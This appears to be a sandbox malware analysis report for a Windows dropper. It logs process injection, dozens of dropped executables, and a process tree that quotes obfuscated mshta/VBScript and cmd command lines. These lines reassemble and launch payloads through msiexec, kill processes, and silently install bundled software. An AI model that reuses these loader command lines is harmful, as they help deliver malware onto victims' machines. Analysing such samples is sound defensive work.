Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

description	pid	process	target process
PID 3036 wrote to memory of 1280	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	jMTLm46gEJIfRpgxDblLRf9F.exe
PID 3036 wrote to memory of 1280	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	jMTLm46gEJIfRpgxDblLRf9F.exe
PID 3036 wrote to memory of 1848	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	aj6h9aq1Oy5A1p172nfop_1z.exe
PID 3036 wrote to memory of 1848	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	aj6h9aq1Oy5A1p172nfop_1z.exe
PID 3036 wrote to memory of 1848	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	aj6h9aq1Oy5A1p172nfop_1z.exe
PID 3036 wrote to memory of 2868	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	HfZjSeknn_8lFvezoCMym7zK.exe
PID 3036 wrote to memory of 2868	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	HfZjSeknn_8lFvezoCMym7zK.exe
PID 3036 wrote to memory of 2868	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	HfZjSeknn_8lFvezoCMym7zK.exe
PID 3036 wrote to memory of 2884	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	h2piw7SHAk2FUXox90o31iv6.exe
PID 3036 wrote to memory of 2884	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	h2piw7SHAk2FUXox90o31iv6.exe
PID 3036 wrote to memory of 2884	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	h2piw7SHAk2FUXox90o31iv6.exe
PID 3036 wrote to memory of 2584	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8UTMdc0sSC5dJMqI0wrs9Vi8.exe
PID 3036 wrote to memory of 2584	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8UTMdc0sSC5dJMqI0wrs9Vi8.exe
PID 3036 wrote to memory of 2584	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8UTMdc0sSC5dJMqI0wrs9Vi8.exe
PID 3036 wrote to memory of 1092	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	TFXogshPNMVhCKvZ1M6QDjTe.exe
PID 3036 wrote to memory of 1092	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	TFXogshPNMVhCKvZ1M6QDjTe.exe
PID 3036 wrote to memory of 1092	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	TFXogshPNMVhCKvZ1M6QDjTe.exe
PID 3036 wrote to memory of 2832	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	41becZN7ykRlarMfiT6VFJPv.exe
PID 3036 wrote to memory of 2832	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	41becZN7ykRlarMfiT6VFJPv.exe
PID 3036 wrote to memory of 2832	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	41becZN7ykRlarMfiT6VFJPv.exe
PID 3036 wrote to memory of 60	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	vK6SvNBi5D74H1espDbLP_hA.exe
PID 3036 wrote to memory of 60	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	vK6SvNBi5D74H1espDbLP_hA.exe
PID 3036 wrote to memory of 60	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	vK6SvNBi5D74H1espDbLP_hA.exe
PID 3036 wrote to memory of 1032	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	15XMBCpxyCxaNEXBZDkFGzMI.exe
PID 3036 wrote to memory of 1032	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	15XMBCpxyCxaNEXBZDkFGzMI.exe
PID 3036 wrote to memory of 1032	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	15XMBCpxyCxaNEXBZDkFGzMI.exe
PID 3036 wrote to memory of 368	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
PID 3036 wrote to memory of 368	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
PID 3036 wrote to memory of 368	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
PID 3036 wrote to memory of 688	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PhqrYJQomviCIRSWpyIt8dQZ.exe
PID 3036 wrote to memory of 688	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PhqrYJQomviCIRSWpyIt8dQZ.exe
PID 3036 wrote to memory of 688	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PhqrYJQomviCIRSWpyIt8dQZ.exe
PID 3036 wrote to memory of 1588	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wOvwOyyvUhmeksjM_VgC2z6f.exe
PID 3036 wrote to memory of 1588	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wOvwOyyvUhmeksjM_VgC2z6f.exe
PID 3036 wrote to memory of 1588	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	wOvwOyyvUhmeksjM_VgC2z6f.exe
PID 3036 wrote to memory of 1116	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
PID 3036 wrote to memory of 1116	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
PID 3036 wrote to memory of 1116	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
PID 3036 wrote to memory of 3908	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	J7qI7Fchr642VhuD0Cf3cCaR.exe
PID 3036 wrote to memory of 3908	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	J7qI7Fchr642VhuD0Cf3cCaR.exe
PID 3036 wrote to memory of 3908	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	J7qI7Fchr642VhuD0Cf3cCaR.exe
PID 3036 wrote to memory of 1708	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	9lKjDj4o_xSeel9jjoioM5mK.exe
PID 3036 wrote to memory of 1708	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	9lKjDj4o_xSeel9jjoioM5mK.exe
PID 3036 wrote to memory of 1708	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	9lKjDj4o_xSeel9jjoioM5mK.exe
PID 3036 wrote to memory of 4008	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	zPgTLoLvPXkHhmuGNwWdg70B.exe
PID 3036 wrote to memory of 4008	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	zPgTLoLvPXkHhmuGNwWdg70B.exe
PID 3036 wrote to memory of 2160	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	a5aD5wxjRmB9sJpSc45mwwb5.exe
PID 3036 wrote to memory of 2160	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	a5aD5wxjRmB9sJpSc45mwwb5.exe
PID 3036 wrote to memory of 2160	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	a5aD5wxjRmB9sJpSc45mwwb5.exe
PID 3036 wrote to memory of 3376	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
PID 3036 wrote to memory of 3376	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
PID 3036 wrote to memory of 3376	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
PID 3036 wrote to memory of 2244	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
PID 3036 wrote to memory of 2244	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
PID 3036 wrote to memory of 2244	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
PID 3036 wrote to memory of 1232	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
PID 3036 wrote to memory of 1232	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
PID 3036 wrote to memory of 1232	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
PID 3036 wrote to memory of 1712	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	frMqzgLn3vlWWH7PNbBw0x3X.exe
PID 3036 wrote to memory of 1712	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	frMqzgLn3vlWWH7PNbBw0x3X.exe
PID 3036 wrote to memory of 1712	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	frMqzgLn3vlWWH7PNbBw0x3X.exe
PID 3036 wrote to memory of 3292	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8L3PF0_KBJdEapAt_uAiTF2G.exe
PID 3036 wrote to memory of 3292	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8L3PF0_KBJdEapAt_uAiTF2G.exe
PID 3036 wrote to memory of 3292	3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	8L3PF0_KBJdEapAt_uAiTF2G.exe

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3036

C:\Users\Admin\Pictures\Adobe Films\jMTLm46gEJIfRpgxDblLRf9F.exe
"C:\Users\Admin\Pictures\Adobe Films\jMTLm46gEJIfRpgxDblLRf9F.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1280

C:\Users\Admin\Pictures\Adobe Films\aj6h9aq1Oy5A1p172nfop_1z.exe
"C:\Users\Admin\Pictures\Adobe Films\aj6h9aq1Oy5A1p172nfop_1z.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Users\Admin\Pictures\Adobe Films\TFXogshPNMVhCKvZ1M6QDjTe.exe
"C:\Users\Admin\Pictures\Adobe Films\TFXogshPNMVhCKvZ1M6QDjTe.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1092

C:\Users\Admin\Pictures\Adobe Films\8UTMdc0sSC5dJMqI0wrs9Vi8.exe
"C:\Users\Admin\Pictures\Adobe Films\8UTMdc0sSC5dJMqI0wrs9Vi8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Users\Admin\Pictures\Adobe Films\h2piw7SHAk2FUXox90o31iv6.exe
"C:\Users\Admin\Pictures\Adobe Films\h2piw7SHAk2FUXox90o31iv6.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2884

C:\Users\Admin\Documents\FByelq6MdrWeI5vhR6omHfi1.exe
"C:\Users\Admin\Documents\FByelq6MdrWeI5vhR6omHfi1.exe"
3⤵
PID:4296

C:\Users\Admin\Pictures\Adobe Films\H9qsrc3EsuDTFSz54UJ_zCH1.exe
"C:\Users\Admin\Pictures\Adobe Films\H9qsrc3EsuDTFSz54UJ_zCH1.exe"
4⤵
PID:5924

C:\Users\Admin\Pictures\Adobe Films\43JvEbKnIAxGebZ9xSrWdSpR.exe
"C:\Users\Admin\Pictures\Adobe Films\43JvEbKnIAxGebZ9xSrWdSpR.exe"
4⤵
PID:4116

C:\Users\Admin\Pictures\Adobe Films\ZUKe9Oy2fX69aBTAQ6ZG8_9w.exe
"C:\Users\Admin\Pictures\Adobe Films\ZUKe9Oy2fX69aBTAQ6ZG8_9w.exe"
4⤵
PID:6136

C:\Users\Admin\Pictures\Adobe Films\Han9sFbJYg7u82n95ehDqV0g.exe
"C:\Users\Admin\Pictures\Adobe Films\Han9sFbJYg7u82n95ehDqV0g.exe"
4⤵
PID:3184

C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe
"C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe"
4⤵
PID:6128

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
5⤵
PID:5368

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\XY5WIMQRyTbVkTBeuzQAC0f1.exe" ) do taskkill -f -iM "%~NxM"
6⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
7⤵
PID:6100

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:5268

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
8⤵
PID:5160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
9⤵
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
10⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
10⤵
PID:5032

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
10⤵
PID:5716

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "XY5WIMQRyTbVkTBeuzQAC0f1.exe"
7⤵
- Kills process with taskkill
PID:5968

C:\Users\Admin\Pictures\Adobe Films\r0lolux81gSuPSgoTnAObIu0.exe
"C:\Users\Admin\Pictures\Adobe Films\r0lolux81gSuPSgoTnAObIu0.exe"
4⤵
PID:3832

C:\Users\Admin\Pictures\Adobe Films\fOtdXl9h5SvldiUkrojKr3UI.exe
"C:\Users\Admin\Pictures\Adobe Films\fOtdXl9h5SvldiUkrojKr3UI.exe"
4⤵
PID:668

C:\Users\Admin\Pictures\Adobe Films\LXcBIj_tghdVOycgj0z5xTrq.exe
"C:\Users\Admin\Pictures\Adobe Films\LXcBIj_tghdVOycgj0z5xTrq.exe"
4⤵
PID:5452

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
5⤵
PID:5772

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
6⤵
PID:3996

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffa41c6dec0,0x7ffa41c6ded0,0x7ffa41c6dee0
7⤵
PID:5116

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff75bee9e70,0x7ff75bee9e80,0x7ff75bee9e90
8⤵
PID:4924

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,7473137964186624566,8156217664129380584,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3996_486604516" --mojo-platform-channel-handle=1672 /prefetch:8
7⤵
PID:956

C:\Users\Admin\Pictures\Adobe Films\TqeM3r2RyjeU7_xlyaImmMLx.exe
"C:\Users\Admin\Pictures\Adobe Films\TqeM3r2RyjeU7_xlyaImmMLx.exe"
4⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\is-FJFF1.tmp\TqeM3r2RyjeU7_xlyaImmMLx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FJFF1.tmp\TqeM3r2RyjeU7_xlyaImmMLx.tmp" /SL5="$302BA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\TqeM3r2RyjeU7_xlyaImmMLx.exe"
5⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\is-5RPKQ.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-5RPKQ.tmp\DYbALA.exe" /S /UID=2709
6⤵
PID:2940

C:\Users\Admin\AppData\Local\Temp\51-88023-3da-444ba-3ec538fef9d74\Jujolaezhaevae.exe
"C:\Users\Admin\AppData\Local\Temp\51-88023-3da-444ba-3ec538fef9d74\Jujolaezhaevae.exe"
7⤵
PID:6396

C:\Users\Admin\AppData\Local\Temp\ec-577de-6d4-0faae-e8849f73764e6\Gokujasaele.exe
"C:\Users\Admin\AppData\Local\Temp\ec-577de-6d4-0faae-e8849f73764e6\Gokujasaele.exe"
7⤵
PID:5860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ioxq4w2.bow\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
8⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\1ioxq4w2.bow\setting.exe
C:\Users\Admin\AppData\Local\Temp\1ioxq4w2.bow\setting.exe SID=778 CID=778 SILENT=1 /quiet
9⤵
PID:7528

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1ioxq4w2.bow\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1ioxq4w2.bow\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636294790 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
10⤵
PID:8048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aahtxygt.2au\GcleanerEU.exe /eufive & exit
8⤵
PID:5624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0wd3s2e.4wi\installer.exe /qn CAMPAIGN="654" & exit
8⤵
PID:4776

C:\Users\Admin\AppData\Local\Temp\i0wd3s2e.4wi\installer.exe
C:\Users\Admin\AppData\Local\Temp\i0wd3s2e.4wi\installer.exe /qn CAMPAIGN="654"
9⤵
PID:7436

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\i0wd3s2e.4wi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\i0wd3s2e.4wi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636294790 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
10⤵
PID:8652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sl023wny.eet\vpn.exe /silent /subid=798 & exit
8⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\sl023wny.eet\vpn.exe
C:\Users\Admin\AppData\Local\Temp\sl023wny.eet\vpn.exe /silent /subid=798
9⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\is-8CMAH.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8CMAH.tmp\vpn.tmp" /SL5="$1048E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\sl023wny.eet\vpn.exe" /silent /subid=798
10⤵
PID:7412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
11⤵
PID:5488

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
12⤵
PID:8408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
11⤵
PID:8620

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
12⤵
PID:3176

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
11⤵
PID:8088

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
11⤵
PID:9044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0roormms.xxe\any.exe & exit
8⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\0roormms.xxe\any.exe
C:\Users\Admin\AppData\Local\Temp\0roormms.xxe\any.exe
9⤵
PID:7824

C:\Users\Admin\AppData\Local\Temp\0roormms.xxe\any.exe
"C:\Users\Admin\AppData\Local\Temp\0roormms.xxe\any.exe" -u
10⤵
PID:7480

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0jcljho.dnt\gcleaner.exe /mixfive & exit
8⤵
PID:6672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3bqxztgm.w05\autosubplayer.exe /S & exit
8⤵
PID:6120

C:\Users\Admin\AppData\Local\Temp\3bqxztgm.w05\autosubplayer.exe
C:\Users\Admin\AppData\Local\Temp\3bqxztgm.w05\autosubplayer.exe /S
9⤵
PID:8064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:7808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:7712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:4436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:8368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:9064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:4180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nszAC9B.tmp\tempfile.ps1"
10⤵
PID:8416

